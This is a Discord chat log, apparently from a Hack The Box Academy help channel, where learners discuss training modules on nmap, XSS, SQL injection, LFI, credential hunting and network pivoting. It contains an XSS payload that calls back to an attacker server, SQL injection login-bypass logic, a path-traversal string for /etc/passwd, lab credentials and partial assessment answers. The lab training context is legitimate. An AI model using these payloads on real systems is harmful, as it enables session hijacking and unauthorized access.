It isn't the nmap scan doesn't print only banner

so the thing is i dont know what a banner is i guess?
if i see this as a answer from nmap:
445/tcp open netbios-ssn Samba smbd 4.6.2
how tf should i know that only the last part is the banner if i normally would think the whole thing would be a banner. maybe im just dumb i dont know

sorry for swearing btw. am kinda riled up because i sit on this question already for an hour.

No it's a issue that u don't know everyone learns, just that the banner is something else just printed in nmap format so question wasn't worded incorrectly

so can i like say that the last part of nmap scan outputs is always the banner or how do i identify a "banner"?

I don't think it is always banner, not sure tho

Two sure ways to identify are to manually connect to service for fingerprinting

nc $ip $port
Or
Using the banner script in nmap through above given command

the banner script still gives me the whole line there is barely any difference.

so i have to basically assume that the last part is the banner

or like u say connect manually and hope for a greetings msg?

also when i do this
nc $ip $port
it just loads in terminal and then just stops - nothing happens

Role

Man, my last Skills Assessment took me 2.5 days of enumerating, 5 mins of exploitation.

@plain spruce You need to focus hard on trying to not get so frustrated, spending an hour trying to get an answer is annoying but you MUST be expecting it, and only be happy when you achieve the results, reflect back on WHY you spent that much time, and for next time try to always just do it better 🙂

yeah was just frustrated that i know i have the answer but dont know what they want from me thats all.
if i diddnt have the answer in front of me i wouldnt be so upset lol.
But yeah it is what it is.

Bro again, I spent 2.5 days looking for an answer that took me 5 minutes to actually get

You're not alone at all brother

i mean i literally got the flag in 2 mins and spend 1 hour formatting the answer for the first questions and just didnt want to work so dumb lol

yeah

Next time you feel stuck, go take a 15-20min break, when you come back READ the entire lesson again, and re-try. Your best way to remember/learn.

i wonder if they do like a trim on that input field bcs that doesnt feel like it rn

i dont think you are being serious with that tip for the issue i just had right?

You're overthinking it way too hard rn bro, it will be more understandable as you follow aloong

No that tip is 100% serious, that rule I follow for EVERY lesson I get stuck on.

If you wish to sit there in frustration, feel free to do so. I'm only giving a reccomendation

im geninuely curious. im working as a software dev i just wanted to know how they handle the input in the input field thats all. im not overthinking anything lmao

I'm just a bit confused on your question truthfully

https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/trim

i wonder if they are doing this.

For trimming the nmap scan? No definitely not

or something like a regex to remove whitespace you know

NOOO LMAO. never mind bro.

You make no sense bro

As someone whos 97% in the path, I can tell you that ignore whatever you are thinking, you don't need that

dude im literally just asking myself how they handle the input in the input field.
like if they take the string as it is or if they format it with regex or trim to remove whitespace that is all.
that is not even about my question before. its just genereal question

Hi People! Is there anyone willing to help with the Password Attacks: Credential Hunting in Network Shares module page? I've spent about 5 hours on it and still the second question remains unsolved. I tried each tool discussed on the target, each pattern mentioned, enumerated everything manually, though the only thing I assumed was the right answer was also a dummy. I may provide any details if needed (except the commands I used, cause my PwnBox ended several times). I definitely have missed smth...

dude im a software dev and just curious its not about hacking at all rn im wondering about the app.

I won't be able to answer that question, as I have no idea bro. Hopefully someone else can

doesnt matter. i was just thinking out loud dw.

Dm me if you'd like I can assist

sorry my bad for misguiding you, most of what I said is generally applicable but smb wants to that special case 😅
So to get smb banner you have three options
nmap -sV and get the version column that is the banner
Wireshark and use smbclient, you would see banner in Wireshark hopefully.
Or make smb initialization request that requires non-printable character so you would have to use python scapy or something similar, that's the reason nc was not working. Again sorry for inconvenience

all good. im here to learn 🙂
that was alot for me what u just typed, i will focus for now on nmap. but thx ❤️

no chat br in server ?

Here by screenshot of jd-gui:

This might be a dumb question.. But do i need to open HTB and get the target IN my VMware to make it all work? or can i get a target on my own pc and just make sure the OVPN is working?

Under File Inclusion > Local File Inclusion there are lots of code snippets listed that show how the input is sanitized or altered before being passed on to the webpage. For the example page given, where would I find the snippet of code given earlier?

Connect to VPN and target will be opened to your machine

i actually just did this one yesterday,i remember looking around the classes to find credentials

it should look like $rcon = new rcon (something, password, somethingelse)

Thanks for responding! Might have another problem then.. Cant get my rev shell to connect ill go check it out again!

Get-NetUser -TrustedToAuth is not working in Kerberos Constrained Delegation section in windows attacks & defense module

Whenever I execute the command, it says the parameter is not found.

any1 know how to fix this? this is pivoting and tunneling > scoksoverRDP (yes i did set it to the modem setting)

Hey guys I wrote this yesterday but I guess people were signed off. Can anyone help me figure out how to test each field in a login form for XSS session hijacking?

The module explains how to do this.

<script src="http://IP:PORT"></script>

You can do both. I prefer a request and a different payload in each field

It's just a bit confusing tbh. It says use the payload in each field to send http request back to our server but does that mean I should have nc listener running? Because when I do and submit a feild with the payload I'm not getting any response

I would start a web server. Then you can also see if several fields want to access your web server.

Ok I'll try that. But you see how that seems confusing? Because it doesnt say anything about starting web server. The module only discusses php server. Doesn't even say anything about nc server or http server

I'm not a pro at this so sorry if I sound dumb

Well, it is a Tier II module. That sets certain basic requirements. For example, how you can recognize whether an HTTP request has been sent to your system.

We are all here to learn.

Sorry, i keep getting stuck on Nibbler..(i know i know..) i seem to do everything it says yet my rev shell wont work, i get no responding on my -lvnp <port> anyone that could check a bit more in depth where it might go wrong? been working on it for several hours now but i cant find it

The modules are designed so that you learn the basics in the Tier 0 modules. You will expand your knowledge with the Tier I and II modules.

Also just curious is Active Directory the hardest/longest module in your opinion?

By the way, the cheat sheet mentions how you can start a web server or a Netcat listener

You are absolutely right lol wow.

idk, probably the longest module.

Hold on, could it be, the rev shell code they give. is it possible that that one doesnt work(anymore) and i have to use another code? or is it 100% working with that code

Hi I've done it yesterday

Send me a DM I can help, got notes for all stages of it.

@wild sedge But did you found the libs to debug the app locally?

Hi quick question
Attacking enterprise networks -> external information gathering
The question is:
"Perform vhost discovery, what additional vhost" exists
Im bruting with ffuf, filter the right size but i get some garbage unrelated vhosts with 'size:0'

You are a hero! That worked. Reduced the MTU from the VPN connection and now I was able to connect! Thanks ❤️ @feral nimbus : Sorry for pinging, but maybe for the next trouble shooting 🙂

hi guys
I haven't been able to connect to RDP for 4 days in a row.
AD module - htb academy
i can't share screenshot on the channel. so how to fix it

change vpn regions?

Hi, can I talk to a mod privately?

i need to send a photo

can't connect is vague: do you receive errors?

if it's not related to server moderation, no

if you want to be able to post images in here there's instructions in #welcome on linking your HTB account to the discord

It's from a password attacks module, where I found the password with LaZagne, but it doesn't accept it as a correct answer.

this section? https://academy.hackthebox.com/module/147/section/3714

i tried but nothing happen

https://academy.hackthebox.com/module/147/section/1326 this one

the first question

RDP a10.129.188.165 (ACADEMY-EA-MS01) user " htb-student " e password " Academy_student_AD! "

[21:02:48:781] [67059:67060] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[21:02:48:781] [67059:67060] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[21:02:48:782] [67059:67060] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel disp

and i see black screen

press enter

nothing change ahah

@south marten ?

this is the output on my terminal
[21:02:48:781] [67059:67060] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[21:02:48:781] [67059:67060] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[21:02:48:782] [67059:67060] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel disp

yes, this one

and the rdp box is black

the first question on this section has nothing to do with grabbing a password

so when you press enter on the black screen, nothing happens?

is not with LaZagne?

this question, yes?

What is the name of the file stored on a domain controller that contains the password hashes of all domain accounts? (Format: ****.***)

ok now it's done. i pressed enter two times in a row

thank you

is not this question

aaa. im sorry

well that's the "First question" on that section

i confuse the module, is credential hunting

the next one

What password does Bob use to connect to the Switches via SSH? (Format: Case-Sensitive) ?

yes, is this one

the answer is We..23

is not ? FS...123

no

thats the password i get wit LaZagne

:(

look carefully at what the question asks and what lazagne gave you

the password you got was for a different service that bob uses

there's also other methods to find passwords that were showcased, not just lazagne

lazagne may just show stored passwords

i get winscp password

I hadn't noticed

yerp; LaZagne only looks for stored credentials, it doesn't really check other files or programs that may be like password managers

and why if i try to login in winscp with this credentials i get and error

Because the username may not be "bob"

Also it's an internal machine that's being connected to via winscp

Scp is a file transfer protocol utilizing ssh to securely transfer files

no?

Yes, also module is above t0, be careful with spoilers

aaa, im sorry

but, if im try, why i get and error

You don't really "log in" via scp

You utilize the credentials to transfer files

scp is a more strict file transfer protocol

so, i dont need to use the password i get? sorry for all this question , but im stucked

Is that what the question is asking you to do?

they ask me to find the password that bob uses via ssh

so, i think no

Maybe the credentials are saved in a password manager or a file somewhere

You're getting hung up because you found something that wasn't asked for (yet) because you assume the tool used is some sort of all access tool

When, if you read the section, it simply tells you that LaZagne only looks for insecurely stored credentials via popular applications

I.e. Firefox stored passwords

so. if i want to find the password via ssh, i need to use hydra?

No

Everything you need to answer all the questions is found in context of the user you're given

Utilize the different methods showcased in the section. Not just lazagne

yea, i have all the anwers, the only i don't know how to do is the ssh :(

I've been hinting at it a fair bit

The section hints at utilizing windows search 😉

Heck you can probably find it by just clicking around

Yep pretty much all the questions are able to be answered without using tools

Hey chat when it comes to XSS payload what does the double quotes (">) payload do to make it work as opposed to nothing.? For example "> <script src="http://IP:PORT"></script> works but just <script <src="http://IP:PORT"></script>

The second one doesnt return anything to my nc listener. My question is why does addin "> work?

You're escaping the bounds of the existing tag you're injecting into

Oh ok so everytime I'm testing xss vulnerability i should try both ?

<Img src="[image link]"> by injecting a "> you prematurely close the tag, so <img src=""> <your payload>

All three, single quotes exist too

@south marten you got it figured out?

im doing other question, i was tilted searching the ssh password

@fathom pendant Hey so if "><script src="http://IP:PORT"></script> works and I tried each field individually and figured out which feild is vulnerable, what would be the point of adding a Directory to the payload like <script src="http://IP:PORT/directory"></script>

The /directory is so you don't have to do each individual field

Hello!
I'm doing an AD module and i don't understand one thing in this fragment:

"Next, we can use lookupsid.py from the Impacket toolkit to perform SID brute forcing to find the SID of the child domain. In this command, whatever we specify for the IP address (the IP of the domain controller in the child domain) will become the target domain for a SID lookup."

so, when i have this command:
lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240
What should I enter as the IP address? The DC IP of this child domain? Or is it the IP of the compromised child domain?

So you'd use /username for the username field /comment for the comment field, etc

The DC it looks like

Anyone els has the same issue that libs dir does not have jars to debug locally #modules message

tysm!

But wouldn't you have to know the name of the Directory or you just assuming its called username. Like the feild vulnerable in this case says Profile Picture URL but I saw somewhere to use "/picture" like how would they know its called that exactly?

You're misunderstanding the purpose

Yes i think so

The purpose is to call back to your system

By using the field /username in the username field, for instance, when you call back to your system you know it's the username field that's vulnerable

Tbh I have another problem, a little below it says:

Next, we can rerun the command, targeting the INLANEFREIGHT Domain Controller (DC01) at 172.16.5.5 and grab the domain SID S-1-5-21-3842939050-3880317879-2865463114 and attach the RID of the Enterprise Admins group

So is this definitely the ip of the DC child domain?

It's been a minute since I've done this and it's above tier 0 so, spoilers

i found the gitlab password before de ssh

Search on the system "password"

Or even look at the folder labeled "work stuff"

...

Ohhhh so I can just use the payload in each feild at once, with different directories, instead of refreshing page and trying each field. That way, the one thats vulnerable will return the corresponding directory in one fell swoop

So you're still misunderstanding

I thought it was much more difficult, i am just stupid

It's not about the corresponding directory being revealed

I stopped looking at Workstuff since I found the GitLab credentials.

It's just a way to say "this field is vulnerable" without having to refresh a million

No what i meant by corresponding is it will return whatever directory name that I put for a feild thats vulnerable

Ah gotcha

Yes thats what I meant. Thanks

Tha ks for clarification

understandable, thank you anyway

Please help me how can I pay for monthsly billing as a student 🥹

Support is not provided on Discord, you'd need to reach out to support on the site.

open suppport on the web

Thanks

👍

Hi
I'm stuck in this question:
Navigate to http://[Target IP]:5601, click on the side navigation toggle, and click on "Dashboard". Either create a new visualization or edit the "Failed logon attempts [Disabled user]" visualization, if it is available, so that it includes failed logon attempt data related to disabled users including the logon type. What is the logon type in the returned document?

I searched through the SIEM and I findout the LogonType is 2, and I got the answer is incorrect.

Please anyone help?

hey, im doing active directory and NTDS, and im doing the kerbrute and i have and error with the domain

hi guys. after a week of finishing my photoshop final assignment and taking three days to get some other stuff done I had to get done, I am back in the skills assessment for pivoting, tunneling, and port forwarding module. I am trying to use ligolo to do it and I'm having some issues but I think if I post a screenshot it will spoil something so is anyone available to DM?

I'm using @gray yacht 's video on ligolo to do the assignment

I am able to get past the first pivot but the second pivot is not working

so having trouble not on single pivot but on double pivot

Feel free to DM will reply in a little while!

Ok thanks

Read the question again, it's not looking for attempts. It's asking for the type of log on the user used.

hi guys I have managed to get through the double pivot portion of the skills assessment for pivoting, tunneling, and port forwarding. I am on the second to last question. I managed to get the IP address of the internal network to appear. I think I have the username of the second RDP to get to. But now I need to find the password for the user in order to do a second RDP. I was able to RDP into first pivot into Windows host. But now there's another Windows host deeper in the network I want to connect to. I know RDP port is open on the machine.

I'm guessing its like a triple pivot I need to do?

No harm in trying it

but in order to do it I need to get password of third host

so I got first pivot to work and I got second pivot host done with ligolo

but I'm having trouble finding RDP creds for third pivot

I know port RDP is open

on the host

Cant recall really, but I'd recommend more enumeration

ok

ok I'll figure it out later I gotta go the cafe I'm working at is closing soon

will try again later tonight

AD enumeration and attacks has been the most giant module..lol

Thank you for posting this. I was not giving it 10-15 mins before I'd decline and try again and I was getting really frustrated 😦

Does the bug bounty path on HTB really teach you everything to do bug bounties on Hackerone?

It helps with it

Brain recoup time until tomorrow….

I am having issues logging in to my academy account, anyone that could give me a hand with that?

support

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

thanks, giving it a try

that support chatbot was a very confusing experience... and in the end just told me "we will be back tomorrow", I still cant access my account...

Password Attacks modules have no answers under "show solution". Is that expected? Will there eventually be solutions?

The whole module had a makeover just a few days ago so the walkthrough most likely just hasn't been updated quite yet

You generally shouldn't need the solutions anyway

I'm brand new to pen-testing, so it helps a lot

I am new as well, and I have my opinions on the solutions that I've voiced before.

Figured that was the case, appreciate it!

You can ask for nudges in here on the module/section you're having issues with and someone can push you in the right direction

I generally dislike just giving the solution just bc you're stuck, imo it just reinforces bad habits when you can just click a button and get the answer

@stuck hollow please make sure not to spoil content from modules above tier 0. (hostnames, passwords, usernames, etc)

ok sorry

It can't find the realm, make sure to add the appropriate hostnames to your hosts file and make sure you're on the vpn etc

vpn is ok

hello 👋
is this where i can ask questions from the web requests module?

Yep, this is the channel for asking questions about modules in general

awesome!

so um im doing the web requests module and for some reason the pwnbox doesn't connect to inlanefreight.com?

should i be putting more info into the curl?

so how can i show what its going on? /etc/hosts and vpn are ok

Which specific section? are you able to ping other sites like google.com?

not sure, it can also mean the creds aren't right i believe. i don't know the whole context and haven't done that so i can't help much.

its the first section and yes i can ping google, i feel like im missing something sorry my first day trying htb

i think i found the flag by adding on the http:// part also for submitting flags should i include the HTB{}$ or no?

yea so i got it basically you need to
curl -O https://(IP):(PORT)/{file you want it to be}
and then vim it

use www.inlanefreight.com

made it thanks!

https://academy.hackthebox.com/module/147/section/3714

I got lazagne on RDP windows machine, but not able to install python on it (through python.exe x64 installer). Python is required to execute lazagne.py as there is no lazagne.exe in laZagne-master directory.

What’s keeping you from uploading lazagne.exe yourself?

MMM, a leaning moment for me not to stick to the flow, but keep in mind what is required and not what we are getting by going with the flow and trying to make it work somehow. (Sorry, it does make sense in my head!!) Thanks mate, for the solution and the learning 🙂

Great job

lazagne has a .exe

No wonder windows is so bloated, hacker be putting all the carbs in it

if i had the skill, i'd make a carbonara.exe

Its been eating all the potatoes and now has to worry bout pasta?!?

Them potatoes be going rogue

Hey , just a non-pentesting question, how do you guys send screenshots in this chat. I have tried ctrl+c, ctrl+v,,,,, + (plus) button to the left of this chat box,,,,and also drag&drop.....Is that just me or anyone else also having such an issue

Hello guys hope you are all doing well.
I am new to this field. Till now I have solved only 2 rooms in htb and counting more in the upcoming days.
Could you provide some suggestions/advice how shall I proceed with this journey.
If I am asking it in the wrong chat please redirect me to the right place. Thank you😊.

I believe you need to be hacker level to post images

You'll want to follow the instructions in #welcome to gain access to the other channels like #general and #red-team etc.

Got it. That's kind of a motivation. Thanks.

no rank required for this channel. just a linked account

hmmm, how can i link my account?

as @cloud urchin pointed out to the other person; there's instructions in #welcome to link

Awesome, can paste images now, Thanks.

"lazagne has a .exe"

I have solved the exercise by uploading .exe separately but just want to learn what i might be missing. Downloaded from :https://github.com/AlessandroZ/LaZagne. Can;t find lazagne.exe in it

there's a /releases/ tab in the github repo

https://github.com/AlessandroZ/LaZagne/releases

windows priv esc (useful tools) tool name watson (description - Watson is a .NET tool designed to enumerate missing KBs) Whats refered as KBs here? (I already googled this stuff but i had 0 clue after searching too)

Is there any alternative to droopescan for Joomla and drupal enumeration? As droopescan is not maintained and cannot be used with python3.13 and I don't want to manage multiple python instances.

i think it works with python2 command

i did it without any obstacles i remember

otherwise theres a tool - joomscan try that maybe

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

This channel is for discussion of the various modules on Academy. You'll need to read the #rules and follow the instructions in #welcome to gain access to most of the server. Then you can post your questions in #general or #1024429874246590575 etc.

Im getting throw back to modules when clicking on done reading

what?

you didn't follow the instructions like i said

Done

they changed it to python3, may need to go back to python2 version. But python3 version is giving following output even with docker.

┌──(faiz㉿FAIZ-XEON)-[~/tools/droopescan]
└─$ sudo docker build -t droope/droopescan .
...snip...

┌──(faiz㉿FAIZ-XEON)-[~/tools/droopescan]
└─$ sudo docker run --rm droope/droopescan
Traceback (most recent call last):
  File "/usr/local/bin/droopescan", line 3, in <module>
    from dscan import droopescan
  File "/app/dscan/droopescan.py", line 4, in <module>
    from cement.core import backend, foundation, controller, handler
  File "/usr/local/lib/python3.13/site-packages/cement/core/foundation.py", line 8, in <module>
    from ..core import output, extension, arg, controller, meta, cache, mail
  File "/usr/local/lib/python3.13/site-packages/cement/core/extension.py", line 8, in <module>
    from imp import reload  # pragma: no cover
    ^^^^^^^^^^^^^^^^^^^^^^
ModuleNotFoundError: No module named 'imp'

Got it man thanks.

So for discussing issues faced in any machine or even asking for advice, where do we ask them? Can we do it here or are there any separate channels for that?

for those having this error, edit Dockerfile, from python:3 to python:3.10

This channel is for Academy's modules. If you're working on a box that's #boxes.

Noted 🙌

did you tried installing imp module? (you should have used pip install -r requirements.txt) to avoid that python version error

Howdy, I really hope I am in the right place for this, if not sorry for the intrusion. I was reading though some of the modules and I saw MacOS Fundamentals you need access to an Apple product? So there is no spawning the in house machine to do this lesson? Thanks for the help.

Correct, you need access to an Apple device

there's quite a few disclaimers on the overview of the module that says you need access to a MacOS device to be able to do stuff. It's not very cost effective (or legal, i think) to emulate MacOS devices

Hey guys, I am on the sqli fundamentals and subverting query logic and want to know the difference between these two queries. In the second one username was tom and it logged in as admin

imp module is deprecated from python3.11 onwards and outright removed from python3.13. It is replaced by importlib, I tried to just change module name, but that was not enough for it to work, so best way to make it work is to use python3.10 in docker.

ok noted, Thanks

Hello just wanted to ask if its possible to do the skills assessment of pivoting module with ligolo-ng?
Since every review of CPTS exam i saw used ligolo-ng i thought of learning it and try to finish the skills assessment with it

Why don't you try it and find out?

Hi I am on LFI https://academy.hackthebox.com/module/23/section/251, basic LFI lab, the connection is resetting when I enter ../../../../etc/passwd however, I watched a solution it used to same payload to read passwd file. Is there something wrong with this lab?

Hi Folks, I try out here again.
I have contacted HTB Support about an "issue". Unfortunately, the problem seems to be on my side.
So, on this module https://academy.hackthebox.com/module/87/section/906, there is a question at the end. I am 100% sure about the answer. However, it seems to be false. I have crosschecked, and it is sure it's the good answer. There is some typography specificities ? I don't get why there is an error to be honest... :/

Query 1:
SELECT * WHERE username = "tom" OR (1=1 AND password = "")
Output:
Returns only 1 row, the tom user. 2nd part of the query (after the OR) returns no rows because although 1=1, nobody's password is blank (" ")

Query 2:
SELECT * WHERE (username = "tom" AND password = "") OR 1=1
Output:
Returns all users in the table. 1st part of the query is false because tom has a password (it is not blank), so no rows are returned. Second part of the query (1=1) is always true so it returns all users in the table. You are logged in as admin because the app logic is written to log you in as the first returned row, which can be anyone, which in this lab's case is admin.

Why is the first row retruned admin when selecting *? I'm not sure. Maybe because admin was the first user inserted into the database.

Wow actually worked like a charm

why there is no cheatsheet in session security module?

yea ligolo is goated you should use it for AEN and the exam too

The difference is the evaluation order,
First one:

USERNAME=TOM? OR ('1'='1' AND PASSWORD='') 
# the line in the parenthesis will always be false unless you give it the right password so it's just:
USERNAME=TOM OR FALSE

Second one:

(USERNAME='tom' AND password='') OR '1'='1' 
# Since it always evaluates to true it logs in as the first user in the table which in this case is: Admin

damn bro beat me to it

I wonder why HTB doesn't teach it

I just learned it in like 35 mins or something and my god everything is clear and smooth

pluggable

They probably published the module before ligolong was released or got popular

^

the module came out before ligolo-ng was a thing, and even then when people were picking up on it at first it was in the EARLY dev stages like 0.4.2 or something like that

could HTB add a whole ligolo section? maybe

but then that would break one of the most important modules of the path

maybe towards the end of it

but i do agree that ligolo-ng trivializes learning the rest of it, and that you should grasp the fundamentals before using it

thank you @waxen totem and @pure seal I overlooked the parenthesis part

well there won't be any parenthesis in the actual query but it's just which goes first: AND vs OR
AND is always checked before OR similar to how we multiply before we subtract

I see like pemdas yea

Just finished the pivoting module skills assessment with ligolo that tool is amazing
I will also redo the skills assessment with the things taught in the module
I really enjoyed this one lol

Thank you everyone

guys please help :[

I did ssh into the target, but I am not able to understand what to do exactly :=[

Tried to open my pwnbox and well something went wrong and I get to wait until tomorrow to try again. I am on the Windows Fundamentals and when I went to interact, it was not interacting, just the starting ... and nothing. Can I do this in my own VM?

yes

are you trying to replace the pwnbox or the target?

you cant replcae the target

pwnbox

yeah vm instead of the pwnbox is fine

use netstat to check for services listening on all interfaces (0.0.0.0)

I got connection fail.

did u connect to the vpn

well, ummm, not really kind of. I downloaded it I guess thats also missing...

but how do I do that, connect to the VPN.

do

sudo openvpn <path-to-downloaded-file>

Hi, Iam new here and have a question…what is the “academy VPN” for?

utilizing your own vm or machine to connect to the academy network and access the 10.129.x.x machines

if you're using the pwnbox you don't need to download/use it, the pwnbox (in-browser vm) connects automatically

Ohhh okayyy, thanks!

the answer is not 10...then what is it?

you have some localhost ips in there

also grepping for 0.0.0.0 is misleading, and that really shouldn't be the way you tackle the question

0.0.0.0 is just a wildcard address

something may be listening on a specific interface (that's not localhost) and not be 0.0.0.0

Could you please tell me the command to use then?

you'll want to inverse grep (grep -v for 127.0.0, knowing the localhost ip range is useful here)

i don't really deal in handing out exact commands, rather explaining how you can figure out the solution from where you're at

ok so we need to exclude the localhost ips

using grep -v

that's what the question tells you, doesn't it?

it wants the count of all listening interfaces that AREN'T localhost OR ipv6

ok

thanks

you already got the list for not ipv6 with the '-4' option lumped in

just gotta work through the rest :)

but the wildcard address is used for services listening on all interfaces no? the question seems to ask for the count of services listening on all interfaces (not just localhost/ipv4), not the count of listening services on all interfaces except ipv4 and localhost

or am i misinterpreting the question

take a closer look at the image they sent; telling them to just grep for 0.0.0.0 overlooks the simple fact that it'll also look in all columns for it

grepping 0.0.0.0 isn't the same as starting a service listening on 0.0.0.0 as well

grep is searching the string value

yea, the grep seems to cut the table headers which also includes foreign address, they should only be counting the local address column which provides the answer

of course counting only 0.0.0.0s in the local address column

which is misleading

because NOT ALL SERVICES may be on 0.0.0.0

even discounting the localhost services

well if a service is set to listen on ALL interfaces, its gotta be on 0.0.0.0 right?

you're kind of teaching bad practice saying to grep for 0.0.0.0

i see

while yes, if a service is listening on all it'll be on that -- if a service is listening on one (and not 127.x.x.x) then you'll very easily miss something that could lead you forward

for instance it's running an internal share only accessible on one interface so that other computers on that specific network can access it

that makes sense, but for the purpose of the question which is to find services listening on ALL, is there a better way other than to grep for 0.0.0.0 and maybe also use awk to get the local address column only?

think beyond the purpose of the question specifically

you'd want a command that can be used generally, that gathers the most amount of information that you want and only excludes the information you don't

while in that specific instance, it works fine, think flexibly

by telling someone only to grep for 0.0.0.0 doesn't actually answer the question being posed.

guys, I am just in Linux fundamentals, do u recommend any book to understand all this networking with ipv4, ipv6, what is wildcard and :: this double :: thing when I netstat?... I am very confused...

the question being posed is asking for NOT localhost OR ipv6

so you're going to look for a command or string of commands that answers NOT localhost OR ipv6

wildcard just means it can be used for anything

:: is ipv6

for instance 0.0.0.0 being a wildcard means that it will listen on all available interfaces on the device

this happens when you start a web server or something without specifying the interface name or ip (depending on the program)

Just practice

if you run python3 -m http.server it will, by default, start on all interfaces on port 8000

and instead of listing out all the interfaces it's on, it's shorthanded to 0.0.0.0, which in networking means all

so you'll get the output
started http server on 0.0.0.0:8000

Mmm, You dont need to put the Port in the final

correct my example command i explained how it works by default, without specifying a port

Yes, but becarfoul if you are using pfsense or something, check that the port is not busy.

i'm aware, and i'm being very general here

i'm not trying to overcomplicate the explanation by throwing in additional circumstances